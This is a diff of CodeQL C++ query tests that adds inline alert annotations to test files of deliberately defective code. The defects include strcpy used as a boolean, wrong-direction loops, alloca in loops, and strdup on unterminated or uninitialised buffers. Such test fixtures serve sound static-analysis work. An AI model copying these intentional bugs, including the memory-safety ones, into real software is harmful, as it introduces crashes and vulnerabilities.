@@ class MyAssignable : public Assignable void testFunc2() { Assignable u1, u2; - u2 = u1; + u2 = u1; // $ Alert MyAssignable v1, v2; - v2 = v1; + v2 = v1; // $ Alert } namespace std { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/volatile.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/volatile.c index c34e0818f192..940d38a9511c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/volatile.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/volatile.c @@ -6,18 +6,18 @@ char *pc; volatile char *pv; void f(void) { - c; // BAD + c; // BAD // $ Alert v; // (accesses to volatile variables are considered impure) - pc[5]; // BAD + pc[5]; // BAD // $ Alert pv[5]; ((volatile char *)pc)[5]; - *pc; // BAD + *pc; // BAD // $ Alert *pv; *((volatile char *)pc); - *(pc + 5); // BAD + *(pc + 5); // BAD // $ Alert *(pv + 5); *((volatile char *)(pc + 5)); *(((volatile char *)pc) + 5); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/weak.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/weak.c index ef4bff229488..c76452eda93e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/weak.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/weak.c @@ -15,6 +15,6 @@ int __attribute__((__weak__)) myWeakNothingFunction() } void testWeak() { - myNothingFunction(); // BAD + myNothingFunction(); // BAD // $ Alert myWeakNothingFunction(); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.c index d2a13e17c837..8a9ce7696965 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.c @@ -3,7 +3,7 @@ void C6317_positive(int i) { - if (i & !FLAGS) // BUG + if (i & !FLAGS) // BUG // $ Alert { } } @@ -28,9 +28,9 @@ void bitwiseAndUsage(unsigned int l, unsigned int r) unsigned int x; unsigned z = 0; - x = l & !r; //BUG - x = !FLAGS & r; //BUG - x = !FLAGS & !!r; //BUG + x = l & !r; //BUG // $ Alert + x = !FLAGS & r; //BUG // $ Alert + x = !FLAGS & !!r; //BUG // $ Alert x = !!l & r; // Not a bug - double negation x = !!!l & r; // Not a bug - double negation @@ -44,9 +44,9 @@ void bitwiseOrUsage(unsigned int l, unsigned int r) { unsigned int x; - x = l | !r; //BUG - x = !FLAGS | r; //BUG - x = !FLAGS | !!r; //BUG + x = l | !r; //BUG // $ Alert + x = !FLAGS | r; //BUG // $ Alert + x = !FLAGS | !!r; //BUG // $ Alert x = !!l | r; // Not a bug - double negation x = !!!l | r; // Not a bug - double negation @@ -67,7 +67,7 @@ void bitwiseOperatorsNotCovered(unsigned int l, unsigned int r) void macroUsage(unsigned int arg1, unsigned int arg2) { - if (((!cap_valid(arg1)) | arg2)) { // BUG + if (((!cap_valid(arg1)) | arg2)) { // BUG // $ Alert } } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.cpp index ac3f1ab3ed5c..68231c364ca7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.cpp @@ -3,7 +3,7 @@ void C6317_positive(int i) { - if (i & !FLAGS) // BUG + if (i & !FLAGS) // BUG // $ Alert { } } @@ -28,9 +28,9 @@ void bitwiseAndUsage(unsigned int l, unsigned int r) unsigned int x; unsigned z = 0; - x = l & !r; //BUG - x = !FLAGS & r; //BUG - x = !FLAGS & !!r; //BUG + x = l & !r; //BUG // $ Alert + x = !FLAGS & r; //BUG // $ Alert + x = !FLAGS & !!r; //BUG // $ Alert x = !!l & r; // Not a bug - double negation x = !!!l & r; // Not a bug - double negation @@ -44,9 +44,9 @@ void bitwiseOrUsage(unsigned int l, unsigned int r) { unsigned int x; - x = l | !r; //BUG - x = !FLAGS | r; //BUG - x = !FLAGS | !!r; //BUG + x = l | !r; //BUG // $ Alert + x = !FLAGS | r; //BUG // $ Alert + x = !FLAGS | !!r; //BUG // $ Alert x = !!l | r; // Not a bug - double negation x = !!!l | r; // Not a bug - double negation @@ -67,14 +67,14 @@ void bitwiseOperatorsNotCovered(unsigned int l, unsigned int r) void macroUsage(unsigned int arg1, unsigned int arg2) { - if (((!cap_valid(arg1)) | arg2)) { // BUG + if (((!cap_valid(arg1)) | arg2)) { // BUG // $ Alert } } void bool_examples(bool a, bool b) { - if (a & !b) // dubious (confusing intent, but shouldn't produce a wrong result) + if (a & !b) // dubious (confusing intent, but shouldn't produce a wrong result) // $ Alert { } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.qlref index d50294defe2c..2defdf045755 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/IncorrectNotOperatorUsage/IncorrectNotOperatorUsage.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/IncorrectNotOperatorUsage.ql \ No newline at end of file +query: Likely Bugs/Likely Typos/IncorrectNotOperatorUsage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/ShortCircuitBitMask.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/ShortCircuitBitMask.qlref index be55343c0a6c..8819dc134bf8 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/ShortCircuitBitMask.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/ShortCircuitBitMask.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ShortCircuitBitMask.ql \ No newline at end of file +query: Likely Bugs/Likely Typos/ShortCircuitBitMask.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/big_ints.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/big_ints.cpp index 0f87c3d2fbfc..f404a063d98d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/big_ints.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ShortCircuitBitMask/big_ints.cpp @@ -1,14 +1,14 @@ static void bad(int x) { - x && 2; - x && 4; - x && 16; - x && 256; - x && 0x10000; - x && 0x80000000; - x && 0x100000000LL; - x && 0x800000000LL; - x && 0x10000000000LL; - x && 0x123456789ABLL; + x && 2; // $ Alert + x && 4; // $ Alert + x && 16; // $ Alert + x && 256; // $ Alert + x && 0x10000; // $ Alert + x && 0x80000000; // $ Alert + x && 0x100000000LL; // $ Alert + x && 0x800000000LL; // $ Alert + x && 0x10000000000LL; // $ Alert + x && 0x123456789ABLL; // $ Alert } static void good(int x) { @@ -29,7 +29,7 @@ static void good(int x) { template void templateFunc() { (i & (i - 1)) && true; - 4 && true; + 4 && true; // $ Alert } void templateTest() { @@ -66,4 +66,4 @@ void testMacro() #define MYFLAG (0x80) unsigned int calc1 = 123 & MYFLAG; // OK -unsigned int calc2 = 123 && MYFLAG; // BAD +unsigned int calc2 = 123 && MYFLAG; // BAD // $ Alert diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/UsingStrcpyAsBoolean.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/UsingStrcpyAsBoolean.qlref index 6ae254cc9747..008951cee5c1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/UsingStrcpyAsBoolean.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/UsingStrcpyAsBoolean.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/UsingStrcpyAsBoolean.ql +query: Likely Bugs/Likely Typos/UsingStrcpyAsBoolean.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.c index d08742a5add5..feefc4566f3a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.c @@ -31,37 +31,37 @@ void PositiveCases() char szbuf2[100]; int result; - if (strcpy(szbuf1, "test")) // Bug, direct usage + if (strcpy(szbuf1, "test")) // Bug, direct usage // $ Alert { } - if (!strcpy(szbuf1, "test")) // Bug, unary binary operator + if (!strcpy(szbuf1, "test")) // Bug, unary binary operator // $ Alert { } - if (strcpy(szbuf1, "test") == 0) // Bug, equality operator + if (strcpy(szbuf1, "test") == 0) // Bug, equality operator // $ Alert { } - if (SomeFunction() && strcpy(szbuf1, "test")) // Bug, binary logical operator + if (SomeFunction() && strcpy(szbuf1, "test")) // Bug, binary logical operator // $ Alert { } - if (strncpy(szbuf1, "test", 100)) // Bug + if (strncpy(szbuf1, "test", 100)) // Bug // $ Alert { } - if (!strncpy(szbuf1, "test", 100)) // Bug + if (!strncpy(szbuf1, "test", 100)) // Bug // $ Alert { } - result = !strncpy(szbuf1, "test", 100); // Bug - result = strcpy(szbuf1, "test") ? 1 : 0; // Bug - result = strcpy(szbuf1, "test") && 1; // Bug + result = !strncpy(szbuf1, "test", 100); // Bug // $ Alert + result = strcpy(szbuf1, "test") ? 1 : 0; // Bug // $ Alert + result = strcpy(szbuf1, "test") && 1; // Bug // $ Alert - result = strcpy(szbuf1, "test") == 0; // Bug + result = strcpy(szbuf1, "test") == 0; // Bug // $ Alert - result = strcpy(szbuf1, "test") != 0; // Bug + result = strcpy(szbuf1, "test") != 0; // Bug // $ Alert } void NegativeCases() diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.cpp index 707cf8466143..6cb2434dbd49 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/UsingStrcpyAsBoolean/test.cpp @@ -72,71 +72,71 @@ void PositiveCases() locale_t x; *x = 0; - if (strcpy(szbuf1, "test")) // Bug, direct usage + if (strcpy(szbuf1, "test")) // Bug, direct usage // $ Alert { } - if (!strcpy(szbuf1, "test")) // Bug, unary binary operator + if (!strcpy(szbuf1, "test")) // Bug, unary binary operator // $ Alert { } - if (strcpy(szbuf1, "test") == 0) // Bug, equality operator + if (strcpy(szbuf1, "test") == 0) // Bug, equality operator // $ Alert { } - if (SomeFunction() && strcpy(szbuf1, "test")) // Bug, binary logical operator + if (SomeFunction() && strcpy(szbuf1, "test")) // Bug, binary logical operator // $ Alert { } - if (WCSCPY_6324(wscbuf1, wscbuf2)) // Bug, using a macro + if (WCSCPY_6324(wscbuf1, wscbuf2)) // Bug, using a macro // $ Alert { } - if (wcscpy(wscbuf1, wscbuf2)) // Bug + if (wcscpy(wscbuf1, wscbuf2)) // Bug // $ Alert { } - if (_mbscpy(mbcbuf1, mbcbuf2)) // Bug + if (_mbscpy(mbcbuf1, mbcbuf2)) // Bug // $ Alert { } - if (strncpy(szbuf1, "test", 100)) // Bug + if (strncpy(szbuf1, "test", 100)) // Bug // $ Alert { } - if (wcsncpy(wscbuf1, wscbuf2, 100)) // Bug + if (wcsncpy(wscbuf1, wscbuf2, 100)) // Bug // $ Alert { } - if (_mbsncpy(mbcbuf1, (const unsigned char*)"test", 100)) // Bug + if (_mbsncpy(mbcbuf1, (const unsigned char*)"test", 100)) // Bug // $ Alert { } - if (_strncpy_l(szbuf1, "test", 100, x)) // Bug + if (_strncpy_l(szbuf1, "test", 100, x)) // Bug // $ Alert { } - if (_wcsncpy_l(wscbuf1, wscbuf2, 100, x)) // Bug + if (_wcsncpy_l(wscbuf1, wscbuf2, 100, x)) // Bug // $ Alert { } - if (_mbsncpy_l(mbcbuf1, (const unsigned char*)"test", 100, x)) //Bug + if (_mbsncpy_l(mbcbuf1, (const unsigned char*)"test", 100, x)) //Bug // $ Alert { } - if (!strncpy(szbuf1, "test", 100)) // Bug + if (!strncpy(szbuf1, "test", 100)) // Bug // $ Alert { } - bool b = strncpy(szbuf1, "test", 100); // Bug + bool b = strncpy(szbuf1, "test", 100); // Bug // $ Alert - bool result = !strncpy(szbuf1, "test", 100); // Bug - result = strcpy(szbuf1, "test") ? 1 : 0; // Bug - result = strcpy(szbuf1, "test") && 1; // Bug + bool result = !strncpy(szbuf1, "test", 100); // Bug // $ Alert + result = strcpy(szbuf1, "test") ? 1 : 0; // Bug // $ Alert + result = strcpy(szbuf1, "test") && 1; // Bug // $ Alert - result = strcpy(szbuf1, "test") == 0; // Bug + result = strcpy(szbuf1, "test") == 0; // Bug // $ Alert - result = strcpy(szbuf1, "test") != 0; // Bug + result = strcpy(szbuf1, "test") != 0; // Bug // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.c index d66e027bdc1e..74039347afdd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.c @@ -4,7 +4,7 @@ void Signed() for (i = 0; i < 100; i--) //BUG { - } + } // $ Alert for (i = 0; i < 100; i++) { @@ -12,7 +12,7 @@ void Signed() for (i = 100; i >= 0; i++) //BUG { - } + } // $ Alert for (i = 100; i >= 0; i--) { @@ -26,7 +26,7 @@ void Unsigned() for (i = 0; i < 100; i--) //BUG { - } + } // $ Alert for (i = 0; i < 100; i++) { @@ -34,7 +34,7 @@ void Unsigned() for (i = 100; i >= 0; i++) //BUG { - } + } // $ Alert for (i = 100; i >= 0; i--) { @@ -47,7 +47,7 @@ void InitializationOutsideLoop() for (; i < 100; i--) //BUG { - } + } // $ Alert i = 0; for (; i < 100; i++) @@ -57,7 +57,7 @@ void InitializationOutsideLoop() i = 100; for (; i >= 0; i++) //BUG { - } + } // $ Alert i = 100; for (; i >= 0; i--) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.cpp index 0642eb747c41..768ba77af86f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.cpp @@ -4,7 +4,7 @@ void Signed() for (i = 0; i < 100; i--) //BUG { - } + } // $ Alert for (i = 0; i < 100; i++) { @@ -12,7 +12,7 @@ void Signed() for (i = 100; i >= 0; i++) //BUG { - } + } // $ Alert for (i = 100; i >= 0; i--) { @@ -26,7 +26,7 @@ void Unsigned() for (i = 0; i < 100; i--) //BUG { - } + } // $ Alert for (i = 0; i < 100; i++) { @@ -34,7 +34,7 @@ void Unsigned() for (i = 100; i >= 0; i++) //BUG { - } + } // $ Alert for (i = 100; i >= 0; i--) { @@ -45,7 +45,7 @@ void DeclarationInLoop() { for (signed char i = 0; i < 100; --i) //BUG { - } + } // $ Alert for (signed char i = 0; i < 100; ++i) { @@ -53,7 +53,7 @@ void DeclarationInLoop() for (unsigned char i = 100; i >= 0; ++i) //BUG { - } + } // $ Alert for (unsigned char i = 100; i >= 0; --i) { @@ -68,7 +68,7 @@ void SignedWithVariables() for (i = min; i < max; i--) //BUG { - } + } // $ Alert for (i = min; i < max; i++) { @@ -76,7 +76,7 @@ void SignedWithVariables() for (i = max; i >= min; i++) //BUG { - } + } // $ Alert for (i = max; i >= min; i--) { @@ -90,7 +90,7 @@ void InitializationOutsideLoop() for (; i < 100; --i) //BUG { - } + } // $ Alert i = 0; for (; i < 100; ++i) @@ -100,7 +100,7 @@ void InitializationOutsideLoop() i = 100; for (; i >= 0; ++i) //BUG { - } + } // $ Alert i = 100; for (; i >= 0; --i) @@ -117,11 +117,11 @@ void InvalidCondition() for (i = max; i < min; i--) //BUG { - } + } // $ Alert for (i = min; i > max; i++) //BUG { - } + } // $ Alert } void InvalidConditionUnsignedCornerCase() @@ -132,14 +132,14 @@ void InvalidConditionUnsignedCornerCase() for (i = 100; i < 0; i--) //BUG { - } + } // $ Alert // Limitation. // Currently odasa will not detect this for-loop condition as always true // The rule will still detect the mismatch iterator, but the error message may change in the future. for (i = 200; i >= 0; i++) //BUG { - } + } // $ Alert } void NegativeTestCase() @@ -172,11 +172,11 @@ void FalseNegativeTestCases() { for (int i = 0; i < 10; i = i - 1) {} // For comparison - for (int i = 0; i < 10; i-- ) {} // BUG + for (int i = 0; i < 10; i-- ) {} // BUG // $ Alert for (int i = 100; i > 0; i += 2) {} // For comparison - for (int i = 100; i > 0; i ++ ) {} // BUG + for (int i = 100; i > 0; i ++ ) {} // BUG // $ Alert } void IntendedOverflow(unsigned char p) @@ -193,8 +193,8 @@ void IntendedOverflow(unsigned char p) for (i = m - 2; i < m; i--) {} // DUBIOUS for (i = m; i < m + 1; i--) {} // GOOD - for (s = 63; s < 64; s--) {} // BAD (signed numbers don't wrap at 0 / at all) - for (s = m + 1; s < m; s--) {} // BAD (never runs) + for (s = 63; s < 64; s--) {} // BAD (signed numbers don't wrap at 0 / at all) // $ Alert + for (s = m + 1; s < m; s--) {} // BAD (never runs) // $ Alert for (i = p - 1; i < p; i--) {} // GOOD for (s = p - 1; s < p; s--) {} // BAD [NOT DETECTED] @@ -212,7 +212,7 @@ void IntendedOverflow(unsigned char p) n = 64; for (s = n - 1; s < n; s--) {} // BAD [NOT DETECTED] n = 64; - for (s = n - 1; s < 64; s--) {} // BAD + for (s = n - 1; s < 64; s--) {} // BAD // $ Alert n = 64; for (s = 63; s < n; s--) {} // BAD [NOT DETECTED] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.qlref index af5f0a899cbd..0436ab0d4bd6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/inconsistentLoopDirection/inconsistentLoopDirection.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/inconsistentLoopDirection.ql \ No newline at end of file +query: Likely Bugs/Likely Typos/inconsistentLoopDirection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop.qlref index d5227c40ee4c..301aedbb9c35 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/AllocaInLoop.ql +query: Likely Bugs/Memory Management/AllocaInLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1.cpp index 9071a1052b8d..97debb86c226 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1.cpp @@ -28,7 +28,7 @@ void foo(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) alloca(w1); // BAD + b1 = (char*) alloca(w1); // BAD // $ Alert } } memcpy(b1, v, w1); @@ -52,7 +52,7 @@ void bar(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) alloca(w1); // BAD + b1 = (char*) alloca(w1); // BAD // $ Alert } } } while (0); @@ -77,7 +77,7 @@ void baz(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) alloca(w1); // BAD + b1 = (char*) alloca(w1); // BAD // $ Alert } } memcpy(b1, v, w1); @@ -107,7 +107,7 @@ void case5() { char *buffer; do { - buffer = (char*)alloca(1024); // BAD + buffer = (char*)alloca(1024); // BAD // $ Alert continue; } while (1); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1ms.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1ms.cpp index 9ebf4f17ba16..fd5433efff6e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1ms.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop1ms.cpp @@ -25,7 +25,7 @@ void foo(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) _alloca(w1); // BAD + b1 = (char*) _alloca(w1); // BAD // $ Alert } } memcpy(b1, v, w1); @@ -49,7 +49,7 @@ void bar(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) _malloca(w1); // BAD + b1 = (char*) _malloca(w1); // BAD // $ Alert } } } while (0); @@ -76,7 +76,7 @@ void baz(const struct vtype* vec, int count) { b1 = new char[w1]; } else { // Allocate the buffer on stack - b1 = (char*) _alloca(w1); // BAD + b1 = (char*) _alloca(w1); // BAD // $ Alert } } memcpy(b1, v, w1); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop2.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop2.c index 7f8ce7a07fe0..f221740e33ab 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop2.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop2.c @@ -36,7 +36,7 @@ void foo(const struct vtype* vec, int count) { b1 = (char *)malloc(w1); } else { // Allocate the buffer on stack - b1 = (char*) alloca(w1); // BAD + b1 = (char*) alloca(w1); // BAD // $ Alert iter = 1; } } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop3.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop3.cpp index b3418829e48f..575a7f2086b4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop3.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/AllocaInLoop3.cpp @@ -42,7 +42,7 @@ char *baz(int count) { char *buf; do { buf = ({ - char *b = (char *)alloca(32); // BAD + char *b = (char *)alloca(32); // BAD // $ Alert sprintf(b, "Value is %d\n", count); b; }); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/BoundedLoop.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/BoundedLoop.cpp index fbecb59588da..d1ee978df039 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/BoundedLoop.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/AllocaInLoop/BoundedLoop.cpp @@ -22,7 +22,7 @@ void forTwice() { void forEver() { for (;;) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -35,7 +35,7 @@ void doTwice() { void unknownStartingPoint(int i) { for (; i < 2; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -52,7 +52,7 @@ void atMostTwice() { void sometimesIncrement() { int i = 0; while (i < 2) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert if (getInt()) { i++; } @@ -61,7 +61,7 @@ void sometimesIncrement() { void upAndDown() { for (int i = 0; i < 2; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert if (getInt()) { i--; } @@ -70,7 +70,7 @@ void upAndDown() { void largeBound() { for (int i = 0; i < 10000; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -94,7 +94,7 @@ void maybeSmallOffset() { i = 9997; } for (; i < 10000; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -102,7 +102,7 @@ void incBefore() { int i = -1; i++; // not understood by data flow for (; i < 2; i++) { - alloca(100); // GOOD [FALSE POSITIVE] + alloca(100); // GOOD [FALSE POSITIVE] // $ Alert } } @@ -135,7 +135,7 @@ void eqFalse() { void eqFalseFlipped() { for (int stop = 0; stop == 0; stop = 0) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } @@ -173,7 +173,7 @@ void countDownAssignAdd() { void countDownWrong() { for (int i = 2-1; i >= 0; i++) { - alloca(100); // BAD + alloca(100); // BAD // $ Alert } } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTermination.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTermination.qlref index 3120e479150f..c09d3d9d76aa 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTermination.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTermination.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/ImproperNullTermination.ql \ No newline at end of file +query: Likely Bugs/Memory Management/ImproperNullTermination.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTerminationTainted.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTerminationTainted.qlref index 6fbfb31d7801..778616ca43c4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTerminationTainted.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/ImproperNullTerminationTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-170/ImproperNullTerminationTainted.ql +query: Security/CWE/CWE-170/ImproperNullTerminationTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/test.cpp index 49dc01a40df9..2b6d4ddd3f27 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ImproperNullTermination/test.cpp @@ -23,8 +23,8 @@ void test_unassigned() char buffer1[1024]; char buffer2[1024]; - strdup(buffer1); // BAD - strdup(buffer2); // BAD + strdup(buffer1); // BAD // $ Alert[cpp/improper-null-termination] + strdup(buffer2); // BAD // $ Alert[cpp/improper-null-termination] memcpy(buffer2, buffer1, sizeof(buffer2)); strdup(buffer1); // BAD [NOT DETECTED] @@ -37,7 +37,7 @@ void test_unassigned() strcpy(buffer1, "content"); strdup(buffer1); // GOOD - strdup(buffer2); // BAD + strdup(buffer2); // BAD // $ Alert[cpp/improper-null-termination] memcpy(buffer2, buffer1, sizeof(buffer2)); strdup(buffer1); // GOOD @@ -57,7 +57,7 @@ void test_unassigned() char *ptr1; char *ptr2 = "content"; - strdup(ptr1); // BAD + strdup(ptr1); // BAD // $ Alert[cpp/improper-null-termination] strdup(ptr2); // GOOD } @@ -67,8 +67,8 @@ void test_unassigned() char *ptr; ptr = buffer1; - strdup(buffer1); // BAD - strdup(ptr); // BAD + strdup(buffer1); // BAD // $ Alert[cpp/improper-null-termination] + strdup(ptr); // BAD // $ Alert[cpp/improper-null-termination] 